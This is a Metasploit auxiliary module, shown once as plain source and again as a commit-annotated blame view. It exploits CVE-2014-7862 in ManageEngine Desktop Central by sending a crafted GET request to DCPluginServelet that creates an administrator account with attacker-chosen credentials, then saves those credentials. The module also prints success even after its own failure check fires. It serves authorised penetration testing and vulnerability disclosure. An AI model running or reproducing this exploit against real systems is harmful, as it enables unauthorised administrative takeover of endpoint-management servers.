modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ManageEngine Desktop Central Administrator Account Creation',
        'Description' => %q{
          This module exploits an administrator account creation vulnerability in Desktop Central
          from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in
          several versions of Desktop Central (including MSP) from v7 onwards.
        },
        'Author' => [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2014-7862'],
          ['OSVDB', '116554'],
          ['URL', 'https://seclists.org/fulldisclosure/2015/Jan/2'],
          ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt'],
        ],
        'DisclosureDate' => '2014-12-31'
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The target port', 8020]),
        OptString.new('TARGETURI', [ true, 'ManageEngine Desktop Central URI', '/']),
        OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),
        OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']),
        OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc'])
      ]
    )
  end

  def run
    # Generate password hash
    salt = Time.now.to_i.to_s
    password_encoded = Rex::Text.encode_base64([Rex::Text.md5(datastore['PASSWORD'] + salt)].pack('H*'))

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/servlets/DCPluginServelet'),
      'method' => 'GET',
      'vars_get' => {
        'action' => 'addPlugInUser',
        'role' => 'DCAdmin',
        'userName' => datastore['USERNAME'],
        'email' => datastore['EMAIL'],
        'phNumber' => Rex::Text.rand_text_numeric(6),
        'password' => password_encoded,
        'salt' => salt,
        'createdtime' => salt
      }
    })

    # Yes, "sucess" is really misspelt, as is "Servelet" ... !
    unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/
      print_error('Administrator account creation failed')
    end

    print_good("Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    connection_details = {
      module_fullname: fullname,
      username: datastore['USERNAME'],
      private_data: datastore['PASSWORD'],
      private_type: :password,
      workspace_id: myworkspace_id,
      access_level: 'Administrator',
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_details)
    create_credential_and_login(connection_details)
  end
end
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::Report`

			`def initialize(info = {})`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'ManageEngine Desktop Central Administrator Account Creation',`
			`'Description' => %q{`
			`This module exploits an administrator account creation vulnerability in Desktop Central`
			`from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in`
			`several versions of Desktop Central (including MSP) from v7 onwards.`
			`},`
			`'Author' => [`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module`
			`],`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`'License' => MSF_LICENSE,`
			`'References' => [`
Beautify metadata 2015-01-04 23:08:46 -06:00			`['CVE', '2014-7862'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '116554'],`
Fix http://seclists.org links to https:// 2018-09-15 18:54:45 -05:00			`['URL', 'https://seclists.org/fulldisclosure/2015/Jan/2'],`
Replace links 2015-10-28 10:45:02 -05:00			`['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt'],`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`],`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`'DisclosureDate' => '2014-12-31'`
			`)`
			`)`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00
			`register_options(`
			`[`
			`OptPort.new('RPORT', [true, 'The target port', 8020]),`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`OptString.new('TARGETURI', [ true, 'ManageEngine Desktop Central URI', '/']),`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),`
			`OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']),`
			`OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc'])`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`]`
			`)`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`end`

			`def run`
			`# Generate password hash`
			`salt = Time.now.to_i.to_s`
			`password_encoded = Rex::Text.encode_base64([Rex::Text.md5(datastore['PASSWORD'] + salt)].pack('H*'))`

			`res = send_request_cgi({`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`'uri' => normalize_uri(target_uri.path, '/servlets/DCPluginServelet'),`
			`'method' => 'GET',`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`'vars_get' => {`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`'action' => 'addPlugInUser',`
			`'role' => 'DCAdmin',`
			`'userName' => datastore['USERNAME'],`
			`'email' => datastore['EMAIL'],`
			`'phNumber' => Rex::Text.rand_text_numeric(6),`
			`'password' => password_encoded,`
			`'salt' => salt,`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`'createdtime' => salt`
			`}`
			`})`

Revert spelling correction 2024-01-08 10:51:35 +00:00			`# Yes, "sucess" is really misspelt, as is "Servelet" ... !`
Do minor cleanup 2015-01-04 23:12:42 -06:00			`unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`print_error('Administrator account creation failed')`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`end`
Do minor cleanup 2015-01-04 23:12:42 -06:00
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_good("Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}")`
refactor auxiliary/admin/http credential storage 2017-05-22 23:59:02 -05:00			`connection_details = {`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`module_fullname: fullname,`
			`username: datastore['USERNAME'],`
			`private_data: datastore['PASSWORD'],`
			`private_type: :password,`
			`workspace_id: myworkspace_id,`
			`access_level: 'Administrator',`
			`status: Metasploit::Model::Login::Status::UNTRIED`
refactor auxiliary/admin/http credential storage 2017-05-22 23:59:02 -05:00			`}.merge(service_details)`
			`create_credential_and_login(connection_details)`
Create me_dc9_admin.rb 2014-12-31 02:02:52 +00:00			`end`
			`end`